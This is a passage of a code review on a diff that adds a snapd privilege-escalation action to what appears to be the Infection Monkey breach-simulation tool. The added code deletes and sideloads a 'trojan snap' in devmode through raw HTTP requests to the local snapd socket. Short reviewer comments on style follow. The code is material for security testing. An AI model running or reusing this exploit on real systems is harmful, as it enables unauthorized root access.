monkey/infection_monkey/pe/actions/snapd.py

```diff
@@ -0,0 +1,290 @@
+                'Content-Type: application/json\r\n'
+                'Content-Length: ' + str(len(post_payload)) + '\r\n\r\n'
+                + post_payload)
+
+    # Send our payload to the snap API
+    LOG.info("[+] Deleting trojan snap (and sleeping 5 seconds)...")
+    client_sock.sendall(http_req.encode("utf-8"))
+
+    # Receive the data and extract the JSON
+    http_reply = client_sock.recv(8192).decode("utf-8")
+
+    # Exit on probably-not-vulnerable
+    if '"status":"Unauthorized"' in http_reply:
+        LOG.info("[!] System may not be vulnerable, here is the API reply:\n\n")
+        # LOG.info(http_reply) debug output
+        return False
+
+    # Exit on failure
+    if 'status-code":202' not in http_reply:
+        LOG.info("[!] Did not work, here is the API reply:\n\n")
+        # LOG.info(http_reply) debug output
+        return False
+
+    # We sleep to allow the API command to complete, otherwise the install
+    # may fail.
+    time.sleep(SLEEP)
+    return True
+
+
+def install_snap(client_sock, trojan_snap):
+    """Sideloads the trojan snap"""
+
+    # Decode the base64 from above back into bytes
+    blob = base64.b64decode(trojan_snap)
+
+    # Configure the multi-part form upload boundary here:
+    boundary = '------------------------f8c156143a1caf97'
+
+    # Construct the POST payload for the /v2/snap API, per the instructions
+    # here: https://github.com/snapcore/snapd/wiki/REST-API
+    # This follows the 'sideloading' process.
+    post_payload = '''
+--------------------------f8c156143a1caf97
+Content-Disposition: form-data; name="devmode"
+
+true
+--------------------------f8c156143a1caf97
+Content-Disposition: form-data; name="snap"; filename="snap.snap"
+Content-Type: application/octet-stream
+
+''' + blob.decode('latin-1') + '''
+--------------------------f8c156143a1caf97--'''
+
+    # Multi-part forum uploads are weird. First, we post the headers
+    # and wait for an HTTP 100 reply. THEN we can send the payload.
+    http_req1 = ('POST /v2/snaps HTTP/1.1\r\n'
+                 'Host: localhost\r\n'
+                 'Content-Type: multipart/form-data; boundary='
+                 + boundary + '\r\n'
+                 'Expect: 100-continue\r\n'
+                 'Content-Length: ' + str(len(post_payload)) + '\r\n\r\n')
+
+    # Send the headers to the snap API
+    LOG.info("[+] Installing the trojan snap (and sleeping 8 seconds)...")
+    client_sock.sendall(http_req1.encode("utf-8"))
+
+    # Receive the initial HTTP/1.1 100 Continue reply
+    http_reply = client_sock.recv(8192).decode("utf-8")
+
+    if 'HTTP/1.1 100 Continue' not in http_reply:
+        LOG.error("[!] Error starting POST conversation, here is the reply:\n")
+        # LOG.info(http_reply) debug output
+        return False
+
+    # Now we can send the payload
+    http_req2 = post_payload
+    client_sock.sendall(http_req2.encode("latin-1"))
+
+    # Receive the data
+    http_reply = client_sock.recv(8192).decode("utf-8")
```

Comment:
consts like 8192 should be exported

Reply:
This should all be turned into request statements